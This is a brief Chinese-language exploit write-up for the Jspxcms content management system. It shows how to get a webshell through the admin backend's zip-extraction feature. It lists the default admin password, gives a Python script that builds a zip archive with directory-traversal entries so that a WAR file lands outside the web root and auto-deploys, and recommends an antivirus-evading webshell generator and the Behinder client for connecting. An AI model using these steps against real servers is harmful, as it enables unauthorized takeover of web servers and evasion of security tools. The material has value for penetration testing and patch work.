Jspxcms后台的zip解压功能getshell
由于这套CMS做了相关防御配置,压缩包里像上文中直接加入JSP文件是无法执行的,会报403错误。因而想到使用目录穿越的方式,跳出JspxCM的根目录,并根据war包会自动解压的特点,从而getshell。
jspxcms默认账号密码:admin/123456
import zipfile
if __name__ == "__main__":
try:
binary = b''
zipFile = zipfile.ZipFile("jspxcms.zip", "a", zipfile.ZIP_DEFLATED)
info = zipfile.ZipInfo("jspxcms.zip")
zipFile.writestr("../../../test.html", binary)
zipFile.writestr("../../../", binary)
zipFile.writestr("../../", binary)
zipFile.writestr("../", binary)
zipFile.close()
except IOError as e:
raise e
使用webshell免杀工具生成免杀jsp,并打包成war
本次使用的是:https://github.com/Tas9er/ByPassBehinder
将生成的war包拖到python生成的zip中:
进入后台,上传并解压;
访问 上传成功
冰蝎连接: